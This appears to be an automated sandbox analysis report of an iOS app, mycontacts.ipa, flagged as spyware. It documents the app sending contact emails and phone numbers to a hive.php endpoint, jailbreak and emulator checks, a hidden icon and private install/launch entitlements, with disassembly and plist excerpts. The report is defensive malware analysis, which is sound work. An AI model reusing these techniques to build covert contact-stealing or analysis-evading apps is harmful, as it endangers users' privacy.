Play interactive tour

Edit tour

Analysis Report mycontacts.ipa

Overview

General Information

Sample Name:	mycontacts.ipa
Analysis ID:	129790
MD5:	e0e7ea33957b0b0c30f13df4ec017937
SHA1:	430d7f9c9865dac1f56b9bb5e9ea8700d83409fa
SHA256:	ceeafc96b3bbd7a20749919a86b407863f9fedc83aaafa16e8d2b16c274dea8f
Infos:
Most interesting Screenshot:

Detection

Score:	76
Range:	0 - 100
Whitelisted:	false

Signatures

Attempts to read the proc_native sysctl variable (probably to check if the app is being emulated)

Contains functionality to determine if device is jailbroken

Has the ability to bypass Apple's code review procedure (when using an enterprise certificate for in-house distribution)

Has the permission to install, browse, and/or archive apps (using a private API)

Has the permission to launch other apps (using a private API)

Has the permission to uninstall and/or remove apps from the archive (using a private API)

Hides its icon from the SpringBoard

Sends email addresses over the network

Sends potentially phone numbers over the network

Contains functionality to query for schemes

Contains string references indicative for jailbreak checks

Contains string references to suspicious strings

Encrypts data that contains email addresses

Encrypts data that potentially contains phone numbers

Encrypts data using the common crypto API

Has permission to query schemes that could be used for querying installed apps

IP address seen in connection with other malware

May request permission to access the camera

May request permission to access the contacts database

May request permission to access the photo library

May request permission to use the microphone

Reads the systems OS release and/or type

Classification

Signature Overview

Click to jump to signature section

Show All Signature Results

Source: /var/containers/Bundle/Application/751CF237-924A-4008-9E3F-C6A00D516E2D/mycontacts.app/mycontacts (PID: 27169)

CCCrypt: email addresses in plaintext detected

Jump to behavior

Source: /var/containers/Bundle/Application/751CF237-924A-4008-9E3F-C6A00D516E2D/mycontacts.app/mycontacts (PID: 27169)

CCCrypt: phone number strings in plaintext detected

Jump to behavior

Source: /var/containers/Bundle/Application/751CF237-924A-4008-9E3F-C6A00D516E2D/mycontacts.app/mycontacts (PID: 27169)

CCCrypt: operation encryption

Jump to behavior

Networking:

Sends email addresses over the network

Show sources

Source: global traffic

HTTPS: {"Diane Preston":{"Email":"diane.preston@example.org","Mobile":"+999852333651"},"Bill Gates":{"Email":"bill.gates@example.org","Mobile":"+999123882932"},"James Albano":{"Email":"james.albano@example.org","Mobile":"+999122898777"},"Christine Salander":{"Em

Sends potentially phone numbers over the network

Show sources

Source: global traffic

Source: Joe Sandbox View

IP Address: 93.184.216.34 93.184.216.34

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: unknown

DNS traffic detected: queries for: www.example.com

Source: unknown

HTTP traffic detected: POST /hive.php HTTP/1.1Host: www.example.comContent-Type: application/jsonConnection: keep-aliveAccept: */*User-Agent: mycontacts/1 CFNetwork/1121.2.2 Darwin/19.3.0Content-Length: 1158Accept-Language: en-usAccept-Encoding: gzip, deflate, br

Source: global traffic

HTTP traffic detected: HTTP/1.1 404 Not FoundCache-Control: max-age=604800Content-Type: text/html; charset=UTF-8Date: Wed, 07 Apr 2021 08:10:40 GMTExpires: Wed, 14 Apr 2021 08:10:40 GMTServer: EOS (vny/044E)Content-Length: 445Connection: close

Source: mycontacts	String found in binary or memory: http://certs.apple.com/wwdrg3.der01
Source: embedded.mobileprovision	String found in binary or memory: http://crl.apple.com/iphone.crl0
Source: mycontacts	String found in binary or memory: http://ocsp.apple.com/ocsp03-wwdrg3030
Source: CodeResources	String found in binary or memory: http://www.apple.com/DTDs/PropertyList-1.0.dtd
Source: embedded.mobileprovision	String found in binary or memory: http://www.apple.com/appleca/root.crl0
Source: embedded.mobileprovision	String found in binary or memory: https://www.apple.com/appleca/0
Source: mycontacts	String found in binary or memory: https://www.apple.com/certificateauthority/0

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 60917
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 60916
Source: unknown	Network traffic detected: HTTP traffic on port 60916 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 60917 -> 443

Source: IPA file Info.plist

NSCameraUsageDescription: This app requires access to your camera in order to perform video calls.

Source: IPA file Info.plist

NSMicrophoneUsageDescription: This app requires access to your microphone in order to perform phone calls.

Source: IPA file Info.plist

LSApplicationQueriesSchemes: sinaweibo, weixin, cydia, sileo, zbra

Source: classification engine

Classification label: mal76.spyw.evad.iosIPA@0/0@2/2

Source: Initial sample, func: ___29-[ViewController viewDidLoad]_block_invoke @ 0x10000729c	Static ARM disassembly: 0x1000072ac ldr x1, #0x705c (metainfo: Objc selector ref: doSimpleJailbreakChecks)		f_10000729c
Source: Initial sample, func: ___29-[ViewController viewDidLoad]_block_invoke @ 0x10000729c	Static ARM disassembly: 0x1000072b0 bl 0x100008e70 (metainfo: Objc message: -[x0 doSimpleJailbreakChecks])		f_10000729c

Source: Initial sample, func: -[ViewController sendContacts] @ 0x1000082c0

Static ARM disassembly: 0x1000087cc adr x2, #0x3e8c (metainfo: Objc cfstring ref: @"https://www.example.com/hive.php")

f_1000082c0

Persistence and Installation Behavior:

Has the permission to install, browse, and/or archive apps (using a private API)

Show sources

Source: Initial sample

Embedded entitlements.plist: Entitlement com.apple.private.mobileinstall.allowedSPI contains 'Install', 'Browse', and/or 'Archive'

Has the permission to launch other apps (using a private API)

Show sources

Source: Initial sample

Embedded entitlements.plist: Entitlement com.apple.springboard.launchapplications is true

Has the permission to uninstall and/or remove apps from the archive (using a private API)

Show sources

Source: Initial sample

Embedded entitlements.plist: Entitlement com.apple.private.mobileinstall.allowedSPI contains 'Uninstall', and/or 'RemoveArchive'

Hooking and other Techniques for Hiding and Protection:

Hides its icon from the SpringBoard

Show sources

Source: Initial sample

Info.plist: SBAppTags contains 'hidden' element

Malware Analysis System Evasion:

Attempts to read the proc_native sysctl variable (probably to check if the app is being emulated)

Show sources

Source: /var/containers/Bundle/Application/751CF237-924A-4008-9E3F-C6A00D516E2D/mycontacts.app/mycontacts (PID: 27169)

Sysctl read request: sysctl.proc_native

Jump to behavior

HIPS / PFW / Operating System Protection Evasion:

Has the ability to bypass Apple's code review procedure (when using an enterprise certificate for in-house distribution)

Show sources

Source: Initial sample

Embedded.mobileprovision: ProvisionsAllDevices is true

Language, Device and Operating System Detection:

Contains functionality to determine if device is jailbroken

Show sources

Source: Initial sample, func: -[ViewController doSimpleJailbreakChecks] @ 0x100007f10

Static ARM disassembly, keywords found: selref fileExistsAtPath:, cfcstring /Applications/Cydia.app

f_100007f10

Source: Initial sample, func: -[ViewController tableView:didSelectRowAtIndexPath:] @ 0x100007350	Static ARM disassembly, keywords found: selref canOpenURL		f_100007350
Source: Initial sample, func: -[ViewController doSimpleJailbreakChecks] @ 0x100007f10	Static ARM disassembly, keywords found: selref canOpenURL		f_100007f10

Source: Initial sample, func: -[ViewController doSimpleJailbreakChecks] @ 0x100007f10

Static ARM disassembly, keywords found: /var/lib/cydia, /etc/apt, /private/var/lib/apt, /private/var/Users/, /var/log/apt, /Applications/Cydia.app, /private/var/stash, /private/var/lib/apt/, /private/var/lib/cydia, /private/var/cache/apt/, /private/var/log/syslog

f_100007f10

Source: /var/containers/Bundle/Application/751CF237-924A-4008-9E3F-C6A00D516E2D/mycontacts.app/mycontacts (PID: 27169)	Sysctl requested: kern.ostype	Jump to behavior
Source: /var/containers/Bundle/Application/751CF237-924A-4008-9E3F-C6A00D516E2D/mycontacts.app/mycontacts (PID: 27169)	Sysctl requested: kern.osrelease	Jump to behavior
Source: /var/containers/Bundle/Application/751CF237-924A-4008-9E3F-C6A00D516E2D/mycontacts.app/mycontacts (PID: 27169)	Sysctl requested: kern.osrelease	Jump to behavior

Stealing of Sensitive Information:

Sends email addresses over the network

Show sources

Source: global traffic

Sends potentially phone numbers over the network

Show sources

Source: global traffic

Source: /var/containers/Bundle/Application/751CF237-924A-4008-9E3F-C6A00D516E2D/mycontacts.app/mycontacts (PID: 27169)

CCCrypt: email addresses in plaintext detected

Jump to behavior

Source: /var/containers/Bundle/Application/751CF237-924A-4008-9E3F-C6A00D516E2D/mycontacts.app/mycontacts (PID: 27169)

CCCrypt: phone number strings in plaintext detected

Jump to behavior

Source: IPA file Info.plist

NSContactsUsageDescription: This app requires access to your contacts in order to list your contacts.

Source: IPA file Info.plist

NSPhotoLibraryUsageDescription: This app requires access to your photo library in order to function properly.

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	Windows Management Instrumentation	Path Interception	Path Interception	Application Discovery1	OS Credential Dumping	Application Discovery1	Remote Services	Access Contact List3	Data Encrypted3	Encrypted Channel1	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	Boot or Logon Initialization Scripts	Evade Analysis Environment1	LSASS Memory	System Information Discovery13	Remote Desktop Protocol	Capture Audio1	Standard Application Layer Protocol2	Standard Application Layer Protocol2	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	Logon Script (Windows)	Obfuscated Files or Information	Security Account Manager	Evade Analysis Environment1	SMB/Windows Admin Shares	Data from Local System1	Automated Exfiltration	Ingress Tool Transfer2	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	Binary Padding	NTDS	System Network Configuration Discovery	Distributed Component Object Model	Capture Camera1	Scheduled Transfer	Non-Application Layer Protocol3	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	Software Packing	LSA Secrets	Remote System Discovery	SSH	Keylogging	Data Transfer Size Limits	Application Layer Protocol4	Manipulate Device Communication		Manipulate App Store Rankings or Ratings

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

No Antivirus matches

Dropped Files

No Antivirus matches

Domains

No Antivirus matches

URLs

No Antivirus matches

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
www.example.com	93.184.216.34	true	false	high
api.apple-cloudkit.fe.apple-dns.net	17.248.145.147	true	false	unknown
api.apple-cloudkit.com	unknown	unknown	false	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://www.example.com/hive.php	false		high

Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
93.184.216.34	www.example.com	European Union		15133	EDGECASTUS	false
17.248.145.147	api.apple-cloudkit.fe.apple-dns.net	United States		714	APPLE-ENGINEERINGUS	false

General Information

Joe Sandbox Version:	32.0.0 Black Diamond
Analysis ID:	129790
Start date:	07.04.2021
Start time:	10:09:52
Joe Sandbox Product:	Cloud
Overall analysis duration:	0h 2m 33s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	mycontacts.ipa
Cookbook file name:	defaultiosinteractivecookbook.jbs
Analysis system description:	IPhone 7, iOS 13.3.1
Analysis Mode:	default
Detection:	MAL
Classification:	mal76.spyw.evad.iosIPA@0/0@2/2
Warnings:	Show All Excluded IPs from analysis (whitelisted): 2.17.122.218, 2.17.123.152, 2.17.123.154, 2.17.122.209, 2.17.122.217, 2.17.122.224, 2.17.122.219, 2.17.123.176, 2.17.123.168 Excluded domains from analysis (whitelisted): iphone-ld.apple.com, iphone-ld.origin-apple.com.akadns.net, a1931.dscgi3.akamai.net, iphone-ld.apple.com-v1.edgesuite.net

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Startup

system is iphone1

mycontacts (PID: 27169 PPID: 1 MD5: c486b4884915af4e27df995b133ed3b9)

cleanup

Static File Info

General
File type:	Zip archive data, at least v1.0 to extract
Entropy (8bit):	7.906113375135883
TrID:	iOS Application (40004/1) 66.66% Mac OS X Application Bundle (12004/1) 20.00% ZIP compressed archive (8000/1) 13.33% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.01%
File name:	mycontacts.ipa
File size:	30873
MD5:	e0e7ea33957b0b0c30f13df4ec017937
SHA1:	430d7f9c9865dac1f56b9bb5e9ea8700d83409fa
SHA256:	ceeafc96b3bbd7a20749919a86b407863f9fedc83aaafa16e8d2b16c274dea8f
SHA512:	ac0ac5124f9adbf118a30bef8b970574c2591c2c51373b39f0bdb82d182f1694bf34dcc7d20d0bda796b21fa5f848a4636b13b32afa6fdbb520f3d37462216c7
SSDEEP:	768:+HY1OLSRIHhf/WHl0NohGxrhyKkA4XhAnOOZk:y7QIHhfVMONWCnO
File Content Preview:	PK...........R................Payload/UT...d.l`..l`ux.............PK...........R................Payload/mycontacts.app/UT.....l`..l`ux.............PK...........R............&...Payload/mycontacts.app/_CodeSignature/UT.....l`..l`ux.............PK..........

Archive IPA

Archived Files

File Path	File Attributes	File Size
mycontacts.app	D	0
mycontacts.app/Base.lproj	D	0
mycontacts.app/Base.lproj/LaunchScreen.storyboardc	D	0
mycontacts.app/Base.lproj/LaunchScreen.storyboardc/01J-lp-oVM-view-Ze5-6b-2t3.nib		1136
mycontacts.app/Base.lproj/LaunchScreen.storyboardc/Info.plist		258
mycontacts.app/Base.lproj/LaunchScreen.storyboardc/UIViewController-01J-lp-oVM.nib		832
mycontacts.app/Base.lproj/Main.storyboardc	D	0
mycontacts.app/Base.lproj/Main.storyboardc/BYZ-38-t0r-view-8bC-Xf-vdC.nib		1136
mycontacts.app/Base.lproj/Main.storyboardc/Info.plist		258
mycontacts.app/Base.lproj/Main.storyboardc/UIViewController-BYZ-38-t0r.nib		916
mycontacts.app/Info.plist		1680
mycontacts.app/PkgInfo		8
mycontacts.app/_CodeSignature	D	0
mycontacts.app/_CodeSignature/CodeResources		3895
mycontacts.app/embedded.mobileprovision		7840
mycontacts.app/entitlements.plist		765
mycontacts.app/mycontacts		98464

Extracted Files

Extracted File
File path:	mycontacts.app/Info.plist
File size:	1680
File type:	Apple binary property list

Plist Content

{"BuildMachineOSBuild": "18G8022", "CFBundleDevelopmentRegion": "en", "CFBundleExecutable": "mycontacts", "CFBundleIdentifier": "org.company.mycontacts", "CFBundleInfoDictionaryVersion": "6.0", "CFBundleName": "mycontacts", "CFBundlePackageType": "APPL", "CFBundleShortVersionString": "1.0", "CFBundleSupportedPlatforms": ["iPhoneOS"], "CFBundleVersion": "1", "DTCompiler": "com.apple.compilers.llvm.clang.1_0", "DTPlatformBuild": "16E226", "DTPlatformName": "iphoneos", "DTPlatformVersion": "12.2", "DTSDKBuild": "16E226", "DTSDKName": "iphoneos12.2", "DTXcode": "1020", "DTXcodeBuild": "10E125", "LSApplicationQueriesSchemes": ["sinaweibo", "weixin", "cydia", "sileo", "zbra"], "LSRequiresIPhoneOS": true, "MinimumOSVersion": "12.2", "NSCameraUsageDescription": "This app requires access to your camera in order to perform video calls.", "NSContactsUsageDescription": "This app requires access to your contacts in order to list your contacts.", "NSMicrophoneUsageDescription": "This app requires access to your microphone in order to perform phone calls.", "NSPhotoLibraryUsageDescription": "This app requires access to your photo library in order to function properly.", "SBAppTags": ["hidden"], "UIDeviceFamily": [1, 2], "UILaunchStoryboardName": "LaunchScreen", "UIMainStoryboardFile": "Main", "UIRequiredDeviceCapabilities": ["arm64"], "UISupportedInterfaceOrientations": ["UIInterfaceOrientationPortrait", "UIInterfaceOrientationLandscapeLeft", "UIInterfaceOrientationLandscapeRight"], "UISupportedInterfaceOrientations~ipad": ["UIInterfaceOrientationPortrait", "UIInterfaceOrientationPortraitUpsideDown", "UIInterfaceOrientationLandscapeLeft", "UIInterfaceOrientationLandscapeRight"]}

Extracted File
File path:	mycontacts.app/embedded.mobileprovision
File size:	7840
File type:	data

Plist Content

{"AppIDName": "XC org company mycontacts", "ApplicationIdentifierPrefix": ["47P75DRPUD"], "CreationDate": "2021-04-06 10:31:56", "Platform": ["iOS"], "IsXcodeManaged": true, "DeveloperCertificates": ["b'0\\x82\\x05\\xbb0\\x82\\x04\\xa3\\xa0\\x03\\x02\\x01\\x02\\x02\\x10gQd#\\x9b{V\\x95\\x9a\\xde\\x1f\\xfc\\x82\\xba\\x7f\\x060\\r\\x06\\t*\\x86H\\x86\\xf7\\r\\x01\\x01\\x0b\\x05\\x000u1D0B\\x06\\x03U\\x04\\x03\\x0c;Apple Worldwide Developer Relations Certification Authority1\\x0b0\\t\\x06\\x03U\\x04\\x0b\\x0c\\x02G31\\x130\\x11\\x06\\x03U\\x04\\n\\x0c\\nApple Inc.1\\x0b0\\t\\x06\\x03U\\x04\\x06\\x13\\x02US0\\x1e\\x17\\r210406102155Z\\x17\\r220406102154Z0\\x81\\x961\\x1a0\\x18\\x06\\n\\t\\x92&\\x89\\x93\\xf2,d\\x01\\x01\\x0c\\nJ3UPWR6N9S1A0?\\x06\\x03U\\x04\\x03\\x0c8iPhone Developer: aloe.flava@protonmail.com (Q37GYK6YM2)1\\x130\\x11\\x06\\x03U\\x04\\x0b\\x0c\\n47P75DRPUD1\\x130\\x11\\x06\\x03U\\x04\\n\\x0c\\nAloe Flava1\\x0b0\\t\\x06\\x03U\\x04\\x06\\x13\\x02US0\\x82\\x01\"0\\r\\x06\\t*\\x86H\\x86\\xf7\\r\\x01\\x01\\x01\\x05\\x00\\x03\\x82\\x01\\x0f\\x000\\x82\\x01\\n\\x02\\x82\\x01\\x01\\x00\\xac\\x06\\xfb\\x04:P{\\xe5U\\xe6E\\xb5\\xe2T\\x81\\xf2}\\x12\\x05 \\xefNX\"\\xa0\\xa4\\\\\\xe9\\xcf\\x91E\\xf7\\xac\\xc3\\x86\\xdc\\xdcH\\r\\xa2\\xa0\\x04{\\xa7\\x114\\xbf\\x1a\\x0e\\xee\\x02Z\\xd8\\xf6~\\xe0\\xd5\\xa6L\\x18\\xfc\\xd0\\xe1\\t)3\\x19<\\xb6\\xa4\\xb3\\xed\\xd9\\xe1bj\\x846\\xf02O\\xf8\\xaa\\x91\\xe67g,\\xbd\\x90\\xf4\\xa1\\x11`\\xe9\\x9f\\x05\\x0e\\x91\\xb1\\x9a\\xe0D\\x95\\x15\\x13?c\\x9a\\xa9jC\\x85\\x00\\x1dV\\xfe\\x8a\\xccz\\xe0\\xe3\\xa9!O\\xcb\\xbd/\\xc1\\xe0\\xa2\\xfel\\x0bP\\xe1S\\xcd\\x98+\\'t\\x9e\\xeb\\xc4\\x13zj\\xb5\\x84\\x8b\\xff\\x8d`2&\\xac\\xb7\\xd8v\\xa9Rg\\xcb\\xbfN\\xae8&{\\xfd,\\xd4\\x9b\\x80\\x1d\\xd4\\xe1\\xeb\\xa3H\\x93\\xb1-Y\\x14\\xe5\\x1f7\\xd2[e^TK\\x9a@)\\x0e\\xb2\\xd5Z\\xb7\\x8e\\xd8\\xc2\\xab\\xb4\\xf7X\\xd9\\xab\\xb7pX\\xbe\\xda\\xe1\\xeb\\x8e\\x95#-\\xf2n\\xce\\xe3,K\\x9b,U1\\x03)\\xc9\\xf7\\x1b\\x8d\\x80<\\xf7\\x90&\\xbb!\\xd9\\xa0\\x9a\\xa5\\xb5\\xd9&T%\\x85\\x02\\x03\\x01\\x00\\x01\\xa3\\x82\\x02#0\\x82\\x02\\x1f0\\x0c\\x06\\x03U\\x1d\\x13\\x01\\x01\\xff\\x04\\x020\\x000\\x1f\\x06\\x03U\\x1d#\\x04\\x180\\x16\\x80\\x14\\t\\xfe\\xc0\\x15\\x90\\xf9\\xafd\\n\\x92\\x12\\xb9&(c\\x0c\\x97\\xec\\xa7\\xb20p\\x06\\x08+\\x06\\x01\\x05\\x05\\x07\\x01\\x01\\x04d0b0-\\x06\\x08+\\x06\\x01\\x05\\x05\\x070\\x02\\x86!http://certs.apple.com/wwdrg3.der01\\x06\\x08+\\x06\\x01\\x05\\x05\\x070\\x01\\x86%http://ocsp.apple.com/ocsp03-wwdrg3030\\x82\\x01\\x1e\\x06\\x03U\\x1d \\x04\\x82\\x01\\x150\\x82\\x01\\x110\\x82\\x01\\r\\x06\\t*\\x86H\\x86\\xf7cd\\x05\\x010\\x81\\xff0\\x81\\xc3\\x06\\x08+\\x06\\x01\\x05\\x05\\x07\\x02\\x020\\x81\\xb6\\x0c\\x81\\xb3Reliance on this certificate by any party assumes acceptance of the then applicable standard terms and conditions of use, certificate policy and certification practice statements.07\\x06\\x08+\\x06\\x01\\x05\\x05\\x07\\x02\\x01\\x16+https://www.apple.com/certificateauthority/0\\x16\\x06\\x03U\\x1d%\\x01\\x01\\xff\\x04\\x0c0\\n\\x06\\x08+\\x06\\x01\\x05\\x05\\x07\\x03\\x030\\x1d\\x06\\x03U\\x1d\\x0e\\x04\\x16\\x04\\x14\\x87{XEnj\\xb9UQa\\x19p\\xf6\\x0c\\xeb\\x87\\x97O\\x08\\xe70\\x0e\\x06\\x03U\\x1d\\x0f\\x01\\x01\\xff\\x04\\x04\\x03\\x02\\x07\\x800\\x13\\x06\\n*\\x86H\\x86\\xf7cd\\x06\\x01\\x02\\x01\\x01\\xff\\x04\\x02\\x05\\x000\\r\\x06\\t*\\x86H\\x86\\xf7\\r\\x01\\x01\\x0b\\x05\\x00\\x03\\x82\\x01\\x01\\x00iM\\x10F\\x01\\'K:\\xf7W\\xf5\\x99G\\xe1\\x85_y\\xe8\\x1et\\x86\\x9cx\\xd5\\x07j\\xc1\\x17\\xc7\\x8a\\x9b>\\xcb\\xb4\\xf6\\x18Yv>\\x19\\xd7\\x1c\\xf5\\x12\\x9d0Z\\xd8\\xfb\\x03\\xd4\\xf2xg\\x90,`\\xeb\\x1ap(\\xce\\xbep9\\xd8\\xc4\\xf8\\xfa\\xac\\x1f}\\xfaAS\\xdd\\x98\\x9c\\x98|\\x13S\\xdb\\xe7\\xc6\\xe5\\xcch\\x01\\x96\\x8b\"\\xfd\\xff9oQ93`\\xf2\\xdd\\xf5P\\xed*\\x83\\xbf`\\x95i\\xea\\xb0}\\x1a\\xee\\xbc\\xbf$\\x18\\x94\\xbd\\x05j\\x8f4\\xad\\x87P\\xb1g~\\x81\\xe5\\x88\\xef\\x17a[`\\xc0\\xaa\\xe4\\xfe\\x0eG\\x8e\\xd6d\\xd1\\xc9\\x92\\xb4oN\\x15$\\xbd\\xca\\x03\\x83\\xb5\\x80J\\xd00f\\x9f\\xc7\\xe8\\x04l9\\x91\\x00@}%\\xb0\\xbf\\xf8\\xb1\\x1a\\xe4\\xa6\\x19\\x83l#\\xb7\\'\\x10\\xa6\\x12\\xb8\\xb0\\xf6\\xa14\\x8c\\xbf\\'!\\tM0\\xf9\\xe9\\x7f\\xbe\\x88\\xf8y\\xd8I\\xb3\\xb63\\xbe\\xbb-\\xb5/\\xfem\\xae\\xed\\x18\\xef\\xed\\xaeqU\\xe9\\xdeR\\xfd\\x05L{\\x88\\xacP\\'\\xaewB\\x03\\x8e\\xdb\\xb0\\x9eIbu\\xbe'"], "Entitlements": {"application-identifier": "47P75DRPUD.org.company.mycontacts", "keychain-access-groups": ["47P75DRPUD.*"], "com.apple.springboard.launchapplications": true, "com.apple.private.mobileinstall.allowedSPI": ["Install", "Browse", "Lookup", "Archive", "Uninstall", "RemoveArchive"], "com.apple.developer.team-identifier": "47P75DRPUD"}, "ExpirationDate": "2021-04-13 10:31:56", "Name": "iOS Team Provisioning Profile: org.company.mycontacts", "ProvisionsAllDevices": true, "LocalProvision": true, "TeamIdentifier": ["47P75DRPUD"], "TeamName": "Aloe Flava", "TimeToLive": 7, "UUID": "da47194f-da2e-47a7-ad0d-82a9030e18a2", "Version": 1}

Extracted File
File path:	mycontacts.app/entitlements.plist
File size:	765
File type:	XML 1.0 document, ASCII text

Plist Content

{"application-identifier": "47P75DRPUD.org.company.mycontacts", "com.apple.developer.team-identifier": "47P75DRPUD", "com.apple.springboard.launchapplications": true, "com.apple.private.mobileinstall.allowedSPI": ["Install", "Browse", "Lookup", "Archive", "Uninstall", "RemoveArchive"], "keychain-access-groups": ["47P75DRPUD.org.company.mycontacts"]}

Extracted File
File path:	mycontacts.app/mycontacts
File size:	98464
File type:	Mach-O 64-bit arm64 executable, flags:<NOUNDEFS\|DYLDLINK\|TWOLEVEL\|PIE>

Static Mach Info

General Information for header 1
Endian:	<
Size:	32-bit
Architecture:	ARM64
Filetype:	execute
Nbr. of load commands:	24
Entry point:

segment_command_64 aggregated: 4

Name	Value
segname	__PAGEZERO
vmaddr	0x0
vmsize	0x100000000
fileoff	0x0
filesize	0x0
maxprot	0x0
initprot	0x0
nsects	0
flags	0x0

Name

Value

segname

__TEXT

vmaddr

0x100000000

vmsize

0xC000

fileoff

0x0

filesize

0xC000

maxprot

0x5

initprot

0x5

nsects

flags

0x0

Datas

sectname	segname	addr	size	offset	align	reloff	nreloc	flags
__text	__TEXT	0x100006F58	0x1E70	0x6F58	0x2	0x0	0	0x80000400
__stubs	__TEXT	0x100008DC8	0x114	0x8DC8	0x2	0x0	0	0x80000408
__stub_helper	__TEXT	0x100008EDC	0x12C	0x8EDC	0x2	0x0	0	0x80000400
__const	__TEXT	0x100009008	0x60	0x9008	0x3	0x0	0	0x0
__objc_methname	__TEXT	0x100009068	0x19F6	0x9068	0x0	0x0	0	0x2
__cstring	__TEXT	0x10000AA5E	0x4CC	0xAA5E	0x0	0x0	0	0x2
__objc_classname	__TEXT	0x10000AF2A	0x7B	0xAF2A	0x0	0x0	0	0x2
__objc_methtype	__TEXT	0x10000AFA5	0xFA3	0xAFA5	0x0	0x0	0	0x2
__unwind_info	__TEXT	0x10000BF48	0xB8	0xBF48	0x2	0x0	0	0x0

Name

Value

segname

__DATA

vmaddr

0x10000C000

vmsize

0x4000

fileoff

0xC000

filesize

0x4000

maxprot

0x3

initprot

0x3

nsects

flags

0x0

Datas

sectname	segname	addr	size	offset	align	reloff	nreloc	flags
__got	__DATA	0x10000C000	0x50	0xC000	0x3	0x0	0	0x6
__la_symbol_ptr	__DATA	0x10000C050	0xB8	0xC050	0x3	0x0	0	0x7
__const	__DATA	0x10000C108	0xD0	0xC108	0x3	0x0	0	0x0
__cfstring	__DATA	0x10000C1D8	0x680	0xC1D8	0x3	0x0	0	0x0
__objc_classlist	__DATA	0x10000C858	0x10	0xC858	0x3	0x0	0	0x10000000
__objc_protolist	__DATA	0x10000C868	0x28	0xC868	0x3	0x0	0	0x0
__objc_imageinfo	__DATA	0x10000C890	0x8	0xC890	0x2	0x0	0	0x0
__objc_const	__DATA	0x10000C898	0x19F0	0xC898	0x3	0x0	0	0x0
__objc_selrefs	__DATA	0x10000E288	0x228	0xE288	0x3	0x0	0	0x10000005
__objc_classrefs	__DATA	0x10000E4B0	0xA0	0xE4B0	0x3	0x0	0	0x10000000
__objc_superrefs	__DATA	0x10000E550	0x8	0xE550	0x3	0x0	0	0x10000000
__objc_ivar	__DATA	0x10000E558	0x10	0xE558	0x2	0x0	0	0x0
__objc_data	__DATA	0x10000E568	0xA0	0xE568	0x3	0x0	0	0x0
__data	__DATA	0x10000E608	0x1E0	0xE608	0x3	0x0	0	0x0

Name	Value
segname	__LINKEDIT
vmaddr	0x100010000
vmsize	0xC000
fileoff	0x10000
filesize	0x80A0
maxprot	0x1
initprot	0x1
nsects	0
flags	0x0

dyld_info_command aggregated: 1

Name	Value
rebase_off	65536
rebase_size	440
bind_off	65976
bind_size	1216
weak_bind_off	0
weak_bind_size	0
lazy_bind_off	67192
lazy_bind_size	584
export_off	67776
export_size	32

symtab_command aggregated: 1

Name	Value
symoff	67864
nsyms	283
stroff	72616
strsize	5884

dysymtab_command aggregated: 1

Name	Value
ilocalsym	0
nlocalsym	223
iextdefsym	223
nextdefsym	1
iundefsym	224
nundefsym	59
tocoff	0
ntoc	0
modtaboff	0
nmodtab	0
extrefsymoff	0
nextrefsyms	0
indirectsymoff	72392
nindirectsyms	56
extreloff	0
nextrel	0
locreloff	0
nlocrel	0

dylinker_command aggregated: 1

Name

Value

name

Datas

/usr/lib/dyld

uuid_command aggregated: 1

Name	Value
uuid	b'K^a\x8f\xaf\x175\xef\x85\xbd\x1094x\x84\x85'

build_version_command aggregated: 1

Name

Value

platform

minos

786944

sdk

786944

ntools

Datas

source_version_command aggregated: 1

Name	Value
version	0

entry_point_command aggregated: 1

Name	Value
entryoff	36004
stacksize	0

encryption_info_command_64 aggregated: 1

Name	Value
cryptoff	16384
cryptsize	32768
cryptid	0
pad	0

dylib_command aggregated: 7

Name

Value

name

timestamp

Thu Jan 1 01:00:02 1970

current_version

1570.15.0

compatibility_version

300.0.0

Datas

/System/Library/Frameworks/Foundation.framework/Foundation

Name

Value

name

timestamp

Thu Jan 1 01:00:02 1970

current_version

228.0.0

compatibility_version

1.0.0

Datas

/usr/lib/libobjc.A.dylib

Name

Value

name

timestamp

Thu Jan 1 01:00:02 1970

current_version

1252.250.1

compatibility_version

1.0.0

Datas

/usr/lib/libSystem.B.dylib

Name

Value

name

timestamp

Thu Jan 1 01:00:02 1970

current_version

2.0.0

compatibility_version

1.0.0

Datas

/System/Library/Frameworks/AVFoundation.framework/AVFoundation

Name

Value

name

timestamp

Thu Jan 1 01:00:02 1970

current_version

0.0.0

compatibility_version

0.0.0

Datas

/System/Library/Frameworks/Contacts.framework/Contacts

Name

Value

name

timestamp

Thu Jan 1 01:00:02 1970

current_version

1570.15.0

compatibility_version

150.0.0

Datas

/System/Library/Frameworks/CoreFoundation.framework/CoreFoundation

Name

Value

name

timestamp

Thu Jan 1 01:00:02 1970

current_version

61000.0.0

compatibility_version

1.0.0

Datas

/System/Library/Frameworks/UIKit.framework/UIKit

rpath_command aggregated: 1

Name

Value

path

Datas

@executable_path/Frameworks

linkedit_data_command aggregated: 3

Name	Value
dataoff	67808
datasize	56

Name	Value
dataoff	67864
datasize	0

Name	Value
dataoff	78512
datasize	19952

Internal Symbols

-[AppDelegate .cxx_destruct]

